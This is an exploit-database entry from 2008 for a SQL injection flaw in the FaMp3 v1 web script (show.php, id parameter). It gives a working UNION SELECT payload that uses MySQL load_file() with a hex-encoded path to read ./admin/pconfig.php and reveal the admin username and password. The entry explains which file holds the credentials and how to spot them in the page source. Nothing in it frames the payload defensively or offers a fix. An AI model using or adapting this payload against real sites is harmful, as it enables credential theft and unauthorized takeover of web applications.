FaScript FaMp3 v1 (show.php) Remote SQL Injection Vulnerability

2008-01-15T00:00:00
ID 1337DAY-ID-2499
Type zdt
Reporter IRCRASH
Modified 2008-01-15T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
FaScript FaMp3 v1 (show.php) Remote SQL Injection Vulnerability
===============================================================




#####################################################################################
####               FaScript FaMp3 v1 Remote Sql Injection                        ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#                                                                                   #
#Script Download : http://www.fascript.com/persian.rar                              #
#                                                                                   #
#Injection Adress :  http://127.0.0.1/famp3/show.php?id=<SqL Code>                  #
#                                                                                   #
#Help : In This Script Admin Username and Password Save in ./admin/pconfig.php      #
#       You can open this file with load_file Function in mysql and see admin       #
#       Username and password in Page Source                                        #
#                                                                                   #
# ./admin/pconfig.php Str2Hex : 0x2e2f61646d696e2f70636f6e6669672e706870            #
#                                                                                   #
#SQL Code for pconfig.php : 999999'%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,load_file(0x2e2f61646d696e2f70636f6e6669672e706870)/**/from/**/mysql.user/*
#                                                                                   #
#                        Our site : HTTP://IRCRASH.COM                              #
#                                                                                   #
#####################################################################################



#  0day.today [2018-04-11]  #